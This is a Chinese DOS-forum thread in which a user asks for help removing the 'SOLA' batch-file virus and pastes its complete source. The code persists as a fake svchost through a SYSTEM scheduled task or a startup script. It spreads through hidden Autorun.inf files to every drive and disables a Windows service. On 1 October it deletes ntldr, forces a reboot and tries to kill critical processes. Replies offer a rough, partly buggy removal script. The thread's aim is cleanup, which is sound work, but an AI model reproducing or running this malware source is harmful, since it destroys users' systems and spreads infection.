中国DOS联盟论坛

中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net  论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

游客:  注册 | 登录 | 命令行 | 会员 | 搜索 | 上传 | 帮助 »
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » Dos病毒,求清理
作者:
标题: Dos病毒,求清理 上一主题 | 下一主题
lena
初级用户





积分 154
发帖 67
注册 2007-12-2
状态 离线
『楼 主』:  Dos病毒,求清理

首先大家一起鄙视一下这个人渣。,

病毒的代码如下:

————————————————————————————————————
@echo off
set sola=%systemroot%\Fonts
set setup=%systemroot%\Fonts\solasetup
if not "%1"=="-USB" goto Start
start /max ..
if exist %sola%\SOLA.BAT goto End
::========================Infect==============================
:Infect
cd\
md %systemroot%\Fonts\solasetup
::————文件复制---------
copy sola\Autorun.inf %setup%\Autorun.inf
copy sola\SOLA.BAT %setup%\SOLA.BAT
copy sola\宅男请进.RAR %setup%\宅男请进.RAR
copy sola\Tasks.xxx %setup%\Tasks.xxx
copy sola\sleep.exe %setup%\sleep.exe
tasklist >%sola%\task.txt
FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i
copy %systemroot%\system32\cmd.exe %sola%\%svchost%
del %sola%\task.txt

:Tasks
copy %setup%\Tasks.xxx %systemroot%\Tasks\Tasks.job
schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFail
goto TaskSuc
:TaskFail
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「开始」菜单\程序\启动
echo On Error Resume Next>SOLA.VBS
echo set ws=wscript.createobject("wscript.shell")>>SOLA.VBS
echo ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT",0 >>SOLA.VBS
copy SOLA.VBS %sola%\SOLA.VBS
echo NT>%systemroot%\Fonts\NoTasks

:TaskSuc
attrib %systemroot%\Tasks\Tasks.job +s +h +r
copy %setup%\sola.bat %sola%\sola.bat
copy %setup%\sleep.exe %systemroot%\system32\sleep.exe

:NoAutoPlay
net stop "Shell Hardware Detection"
echo Windows Registry Editor Version 5.00>%systemroot%\Fonts\Regedit.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\Regedit.reg
echo "Start"=dword:00000004>>%systemroot%\Fonts\Regedit.reg
start regedit /s %systemroot%\Fonts\Regedit.reg

:KillTMG

goto End

::======================Infect======================================

::======================Start=======================================

:Start
%homedrive%
cd "%ALLUSERSPROFILE%"
cd 「开始」菜单\程序\启动
date /t >%sola%\est_type2032.fon
findstr /c:"-10-01" "%sola%\est_type2032.fon" & if not errorlevel 1 goto DayOn
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
:Continue
sleep 300&set C=0 & echo 1>C:\solachk1 & findstr . C:\solachk1 & if not errorlevel 1 del C:\solachk1 & sleep 1000&set C=1 & findstr /C:"SOLA_1.0" C:\Autorun.inf & if errorlevel 1  attrib -s -h -r C:\Autorun.inf&copy /y %setup%\Autorun.inf C:\Autorun.inf&attrib C:\Autorun.inf +s +h +r&md C:\SOLA&copy /y "%setup%\*" C:\SOLA\*&attrib C:\SOLA +s +h +r
sleep 300&set D=0 & echo 1>D:\solachk1 & findstr . D:\solachk1 & if not errorlevel 1 del D:\solachk1 & sleep 1000&set D=1 & findstr /C:"SOLA_1.0" D:\Autorun.inf & if errorlevel 1  attrib -s -h -r D:\Autorun.inf&copy /y %setup%\Autorun.inf D:\Autorun.inf&attrib D:\Autorun.inf +s +h +r&md D:\SOLA&copy /y "%setup%\*" D:\SOLA\*&attrib D:\SOLA +s +h +r
sleep 300&set E=0 & echo 1>E:\solachk1 & findstr . E:\solachk1 & if not errorlevel 1 del E:\solachk1 & sleep 1000&set E=1 & findstr /C:"SOLA_1.0" E:\Autorun.inf & if errorlevel 1  attrib -s -h -r E:\Autorun.inf&copy /y %setup%\Autorun.inf E:\Autorun.inf&attrib E:\Autorun.inf +s +h +r&md E:\SOLA&copy /y "%setup%\*" E:\SOLA\*&attrib E:\SOLA +s +h +r
sleep 300&set F=0 & echo 1>F:\solachk1 & findstr . F:\solachk1 & if not errorlevel 1 del F:\solachk1 & sleep 1000&set F=1 & findstr /C:"SOLA_1.0" F:\Autorun.inf & if errorlevel 1  attrib -s -h -r F:\Autorun.inf&copy /y %setup%\Autorun.inf F:\Autorun.inf&attrib F:\Autorun.inf +s +h +r&md F:\SOLA&copy /y "%setup%\*" F:\SOLA\*&attrib F:\SOLA +s +h +r
sleep 300&set G=0 & echo 1>G:\solachk1 & findstr . G:\solachk1 & if not errorlevel 1 del G:\solachk1 & sleep 1000&set G=1 & findstr /C:"SOLA_1.0" G:\Autorun.inf & if errorlevel 1  attrib -s -h -r G:\Autorun.inf&copy /y %setup%\Autorun.inf G:\Autorun.inf&attrib G:\Autorun.inf +s +h +r&md G:\SOLA&copy /y "%setup%\*" G:\SOLA\*&attrib G:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
sleep 300&set H=0 & echo 1>H:\solachk1 & findstr . H:\solachk1 & if not errorlevel 1 del H:\solachk1 & sleep 1000&set H=1 & findstr /C:"SOLA_1.0" H:\Autorun.inf & if errorlevel 1  attrib -s -h -r H:\Autorun.inf&copy /y %setup%\Autorun.inf H:\Autorun.inf&attrib H:\Autorun.inf +s +h +r&md H:\SOLA&copy /y "%setup%\*" H:\SOLA\*&attrib H:\SOLA +s +h +r
sleep 300&set I=0 & echo 1>I:\solachk1 & findstr . I:\solachk1 & if not errorlevel 1 del I:\solachk1 & sleep 1000&set I=1 & findstr /C:"SOLA_1.0" I:\Autorun.inf & if errorlevel 1  attrib -s -h -r I:\Autorun.inf&copy /y %setup%\Autorun.inf I:\Autorun.inf&attrib I:\Autorun.inf +s +h +r&md I:\SOLA&copy /y "%setup%\*" I:\SOLA\*&attrib I:\SOLA +s +h +r
sleep 300&set J=0 & echo 1>J:\solachk1 & findstr . J:\solachk1 & if not errorlevel 1 del J:\solachk1 & sleep 1000&set J=1 & findstr /C:"SOLA_1.0" J:\Autorun.inf & if errorlevel 1  attrib -s -h -r J:\Autorun.inf&copy /y %setup%\Autorun.inf J:\Autorun.inf&attrib J:\Autorun.inf +s +h +r&md J:\SOLA&copy /y "%setup%\*" J:\SOLA\*&attrib J:\SOLA +s +h +r
sleep 300&set K=0 & echo 1>K:\solachk1 & findstr . K:\solachk1 & if not errorlevel 1 del K:\solachk1 & sleep 1000&set K=1 & findstr /C:"SOLA_1.0" K:\Autorun.inf & if errorlevel 1  attrib -s -h -r K:\Autorun.inf&copy /y %setup%\Autorun.inf K:\Autorun.inf&attrib K:\Autorun.inf +s +h +r&md K:\SOLA&copy /y "%setup%\*" K:\SOLA\*&attrib K:\SOLA +s +h +r
sleep 300&set L=0 & echo 1>L:\solachk1 & findstr . L:\solachk1 & if not errorlevel 1 del L:\solachk1 & sleep 1000&set L=1 & findstr /C:"SOLA_1.0" L:\Autorun.inf & if errorlevel 1  attrib -s -h -r L:\Autorun.inf&copy /y %setup%\Autorun.inf L:\Autorun.inf&attrib L:\Autorun.inf +s +h +r&md L:\SOLA&copy /y "%setup%\*" L:\SOLA\*&attrib L:\SOLA +s +h +r
sleep 300&set M=0 & echo 1>M:\solachk1 & findstr . M:\solachk1 & if not errorlevel 1 del M:\solachk1 & sleep 1000&set M=1 & findstr /C:"SOLA_1.0" M:\Autorun.inf & if errorlevel 1  attrib -s -h -r M:\Autorun.inf&copy /y %setup%\Autorun.inf M:\Autorun.inf&attrib M:\Autorun.inf +s +h +r&md M:\SOLA&copy /y "%setup%\*" M:\SOLA\*&attrib M:\SOLA +s +h +r
sleep 300&set N=0 & echo 1>N:\solachk1 & findstr . N:\solachk1 & if not errorlevel 1 del N:\solachk1 & sleep 1000&set N=1 & findstr /C:"SOLA_1.0" N:\Autorun.inf & if errorlevel 1  attrib -s -h -r N:\Autorun.inf&copy /y %setup%\Autorun.inf N:\Autorun.inf&attrib N:\Autorun.inf +s +h +r&md N:\SOLA&copy /y "%setup%\*" N:\SOLA\*&attrib N:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
sleep 300&set O=0 & echo 1>O:\solachk1 & findstr . O:\solachk1 & if not errorlevel 1 del O:\solachk1 & sleep 1000&set O=1 & findstr /C:"SOLA_1.0" O:\Autorun.inf & if errorlevel 1  attrib -s -h -r O:\Autorun.inf&copy /y %setup%\Autorun.inf O:\Autorun.inf&attrib O:\Autorun.inf +s +h +r&md O:\SOLA&copy /y "%setup%\*" O:\SOLA\*&attrib O:\SOLA +s +h +r
sleep 300&set P=0 & echo 1>P:\solachk1 & findstr . P:\solachk1 & if not errorlevel 1 del P:\solachk1 & sleep 1000&set P=1 & findstr /C:"SOLA_1.0" P:\Autorun.inf & if errorlevel 1  attrib -s -h -r P:\Autorun.inf&copy /y %setup%\Autorun.inf P:\Autorun.inf&attrib P:\Autorun.inf +s +h +r&md P:\SOLA&copy /y "%setup%\*" P:\SOLA\*&attrib P:\SOLA +s +h +r
sleep 300&set Q=0 & echo 1>Q:\solachk1 & findstr . Q:\solachk1 & if not errorlevel 1 del Q:\solachk1 & sleep 1000&set Q=1 & findstr /C:"SOLA_1.0" Q:\Autorun.inf & if errorlevel 1  attrib -s -h -r Q:\Autorun.inf&copy /y %setup%\Autorun.inf Q:\Autorun.inf&attrib Q:\Autorun.inf +s +h +r&md Q:\SOLA&copy /y "%setup%\*" Q:\SOLA\*&attrib Q:\SOLA +s +h +r
sleep 300&set R=0 & echo 1>R:\solachk1 & findstr . R:\solachk1 & if not errorlevel 1 del R:\solachk1 & sleep 1000&set R=1 & findstr /C:"SOLA_1.0" R:\Autorun.inf & if errorlevel 1  attrib -s -h -r R:\Autorun.inf&copy /y %setup%\Autorun.inf R:\Autorun.inf&attrib R:\Autorun.inf +s +h +r&md R:\SOLA&copy /y "%setup%\*" R:\SOLA\*&attrib R:\SOLA +s +h +r
sleep 300&set S=0 & echo 1>S:\solachk1 & findstr . S:\solachk1 & if not errorlevel 1 del S:\solachk1 & sleep 1000&set S=1 & findstr /C:"SOLA_1.0" S:\Autorun.inf & if errorlevel 1  attrib -s -h -r S:\Autorun.inf&copy /y %setup%\Autorun.inf S:\Autorun.inf&attrib S:\Autorun.inf +s +h +r&md S:\SOLA&copy /y "%setup%\*" S:\SOLA\*&attrib S:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
sleep 300&set T=0 & echo 1>T:\solachk1 & findstr . T:\solachk1 & if not errorlevel 1 del T:\solachk1 & sleep 1000&set T=1 & findstr /C:"SOLA_1.0" T:\Autorun.inf & if errorlevel 1  attrib -s -h -r T:\Autorun.inf&copy /y %setup%\Autorun.inf T:\Autorun.inf&attrib T:\Autorun.inf +s +h +r&md T:\SOLA&copy /y "%setup%\*" T:\SOLA\*&attrib T:\SOLA +s +h +r
sleep 300&set U=0 & echo 1>U:\solachk1 & findstr . U:\solachk1 & if not errorlevel 1 del U:\solachk1 & sleep 1000&set U=1 & findstr /C:"SOLA_1.0" U:\Autorun.inf & if errorlevel 1  attrib -s -h -r U:\Autorun.inf&copy /y %setup%\Autorun.inf U:\Autorun.inf&attrib U:\Autorun.inf +s +h +r&md U:\SOLA&copy /y "%setup%\*" U:\SOLA\*&attrib U:\SOLA +s +h +r
sleep 300&set V=0 & echo 1>V:\solachk1 & findstr . V:\solachk1 & if not errorlevel 1 del V:\solachk1 & sleep 1000&set V=1 & findstr /C:"SOLA_1.0" V:\Autorun.inf & if errorlevel 1  attrib -s -h -r V:\Autorun.inf&copy /y %setup%\Autorun.inf V:\Autorun.inf&attrib V:\Autorun.inf +s +h +r&md V:\SOLA&copy /y "%setup%\*" V:\SOLA\*&attrib V:\SOLA +s +h +r
sleep 300&set W=0 & echo 1>W:\solachk1 & findstr . W:\solachk1 & if not errorlevel 1 del W:\solachk1 & sleep 1000&set W=1 & findstr /C:"SOLA_1.0" W:\Autorun.inf & if errorlevel 1  attrib -s -h -r W:\Autorun.inf&copy /y %setup%\Autorun.inf W:\Autorun.inf&attrib W:\Autorun.inf +s +h +r&md W:\SOLA&copy /y "%setup%\*" W:\SOLA\*&attrib W:\SOLA +s +h +r
sleep 300&set X=0 & echo 1>X:\solachk1 & findstr . X:\solachk1 & if not errorlevel 1 del X:\solachk1 & sleep 1000&set X=1 & findstr /C:"SOLA_1.0" X:\Autorun.inf & if errorlevel 1  attrib -s -h -r X:\Autorun.inf&copy /y %setup%\Autorun.inf X:\Autorun.inf&attrib X:\Autorun.inf +s +h +r&md X:\SOLA&copy /y "%setup%\*" X:\SOLA\*&attrib X:\SOLA +s +h +r
sleep 300&set Y=0 & echo 1>Y:\solachk1 & findstr . Y:\solachk1 & if not errorlevel 1 del Y:\solachk1 & sleep 1000&set Y=1 & findstr /C:"SOLA_1.0" Y:\Autorun.inf & if errorlevel 1  attrib -s -h -r Y:\Autorun.inf&copy /y %setup%\Autorun.inf Y:\Autorun.inf&attrib Y:\Autorun.inf +s +h +r&md Y:\SOLA&copy /y "%setup%\*" Y:\SOLA\*&attrib Y:\SOLA +s +h +r
sleep 300&set Z=0 & echo 1>Z:\solachk1 & findstr . Z:\solachk1 & if not errorlevel 1 del Z:\solachk1 & sleep 1000&set Z=1 & findstr /C:"SOLA_1.0" Z:\Autorun.inf & if errorlevel 1  attrib -s -h -r Z:\Autorun.inf&copy /y %setup%\Autorun.inf Z:\Autorun.inf&attrib Z:\Autorun.inf +s +h +r&md Z:\SOLA&copy /y "%setup%\*" Z:\SOLA\*&attrib Z:\SOLA +s +h +r
if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS
%systemdrive%
sleep 5000
goto Start

:DayOn
attrib %systemdrive%\ntldr +s -h -r & del /q /a %systemdrive%\ntldr & shutdown -r -t 10 -c "您的计算机上带有SOLA病毒,今天是它的发作日期。病毒已经破坏了您的系统,您的计算机将在10秒钟后重启。" & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn csrss.exe',0);window.close()"
sleep 10000
if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn winlogon.exe',0);window.close()"
goto Start
::=====================Start=========================================

:End
::  毫无疑问,这是一个病毒,我是它的制造者KAKENHI。比起那些编程高手来说,我的水平还差得远,顶多只能算是一个script boy。但经过一番思索后,我还是决定将这个病毒传播出去(尽管这只是献丑罢了^_^)。由于本人爱好ACG,所以如果是同好的话,请打开“宅男请进.RAR”,那里有解药。

——————————————————————————
请大家写一个删除程序。

2008-4-8 20:47
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
lena
初级用户





积分 154
发帖 67
注册 2007-12-2
状态 离线
『第 2 楼』:  

@echo off
set sola=%systemroot%\Fonts
set setup=%systemroot%\Fonts\solasetup
del /f /q %sola%/sola.*
del /f /q %sola%/svchost.exe
del /f /q %setup%/*.*
rd %setup%
for %%a in (c d e f)do del %%a/Autorun.inf
for %%a in (c d e f)do del %%/sola/*.*
for %%a in (c d e f)do rd sola
pause

2008-4-8 20:53
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
lena
初级用户





积分 154
发帖 67
注册 2007-12-2
状态 离线
『第 3 楼』:  

没人知道吗???

2008-4-8 22:01
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
abcd
银牌会员





积分 1436
发帖 739
注册 2007-10-11
状态 离线
『第 4 楼』:  

唯一评价,实在太啰嗦了。

2008-4-8 22:20
查看资料  发短消息 网志  OICQ (470237592)  编辑帖子  回复  引用回复

请注意:您目前尚未注册或登录,请您注册登录以使用论坛的各项功能,例如发表和回复帖子等。


可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题



论坛跳转:  



[ 联系联盟系统管理团队 - 中国DOS联盟 ]

Sponsored by ifanr Inc | © 2001-2023